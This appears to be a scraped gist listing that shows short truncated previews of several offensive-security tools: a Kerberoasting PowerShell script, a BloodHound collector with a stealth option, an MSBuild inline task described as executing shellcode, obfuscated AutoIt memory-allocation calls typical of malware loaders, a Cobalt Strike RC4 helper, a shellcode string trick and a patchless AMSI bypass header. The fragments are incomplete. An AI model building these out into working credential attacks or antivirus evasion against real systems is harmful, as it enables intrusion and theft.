This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<# | |
Kerberoast.ps1 | |
Author: Will Schroeder (@harmj0y) | |
License: BSD 3-Clause | |
Required Dependencies: None | |
Note: the primary method of use will be Invoke-Kerberoast with | |
various targeting options. |
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Invoke-BH{ | |
param( | |
[String[]] | |
$CollectionMethod = [string[]] @('Default'), | |
[Switch] | |
$Stealth, | |
[String] | |
$Domain, | |
[Switch] | |
$WindowsOnly, |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
<!-- This inline task executes x64 shellcode. --> | |
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe SimpleTasks.csproj --> | |
<!-- Save This File And Execute The Above Command --> | |
<!-- Author: Casey Smith, Twitter: @subTee --> | |
<!-- License: BSD 3-Clause --> | |
<Target Name="Hello"> | |
<ClassExample /> | |
</Target> | |
<UsingTask |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Line 588: $arSmtpEight = DllCall("kernel32.dll", "ptr", "VirtualAllocExNuma","handle", $REGULARLYDESCRIBEEDSPRIESTAPT,"ptr", $BeverageIncorporatedBookmarkEstablished,"dword_ptr", $RPCLAIREDEVELOPERPENDINGKILLER,"dword", 0x1000,"dword", 4, "dword", 0) | |
Line 615: $arSmtpEight = DllCall("kernel32.dll", "ptr", "VirtualAllocExNuma","handle", $REGULARLYDESCRIBEEDSPRIESTAPT,"ptr", $BeverageIncorporatedBookmarkEstablished,"dword_ptr", $RPCLAIREDEVELOPERPENDINGKILLER,"dword", 0x3000,"dword", 4, "dword", 0) | |
Line 776: $SOMANONPROFITPD = DllCall("shlwapi.dll", "bool", "PathIsDirectoryW", "wstr", "YAg") | |
Line 825: $ManufacturedVillagesBeadsOvercome = DllCall("kernel32.dll", "long", "GetErrorMode") | |
Line 921: $bbswantingaka = DllCall("shlwapi.dll", "bool", "PathIsDirectoryW", "wstr", "lScKbjVnlu") | |
Line 1370: $ledandorradecadesevanescence = DllCall("kernel32.dll","dword","GetActiveProcessorCount", "dword", 159) | |
Line 1451: $namespacepvcadjustmentbaskets = DllCall("kernel32.dll","dword","GetActiveProcessorCount |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using Org.BouncyCastle.Asn1.Pkcs; | |
using Org.BouncyCastle.Asn1.X509; | |
using Org.BouncyCastle.Asn1.X9; | |
using Org.BouncyCastle.Crypto; | |
using Org.BouncyCastle.Crypto.Generators; | |
using Org.BouncyCastle.Crypto.Operators; | |
using Org.BouncyCastle.Crypto.Parameters; | |
using Org.BouncyCastle.Math; | |
using Org.BouncyCastle.Security; | |
using Org.BouncyCastle.X509; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#RC4 encryption implementation using Java Crypto API | |
#Author: @_EthicalChaos_ | |
import javax.crypto.spec.*; | |
import java.security.*; | |
import javax.crypto.*; | |
# $1 = plaintext, $2 = key | |
sub encryptRC4{ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <stdio.h> | |
#ifdef _WIN64 | |
#define DECLARE_STRING(var, str) __attribute__((section(".text"))) char var[] = "\xe8\x00\x00\x00\x00\x58\x48\x83\xc0\x06\xc3" str; | |
#elif _WIN32 | |
#define DECLARE_STRING(var, str) __attribute__((section(".text"))) char var[] = "\xe8\x00\x00\x00\x00\x58\x83\xc0\x05\xc3" str; | |
#endif | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#ifndef PATCHLESS_AMSI_H | |
#define PATCHLESS_AMSI_H | |
#include <windows.h> | |
static const int AMSI_RESULT_CLEAN = 0; | |
PVOID g_amsiScanBufferPtr = nullptr; | |
unsigned long long setBits(unsigned long long dw, int lowBit, int bits, unsigned long long newValue) { |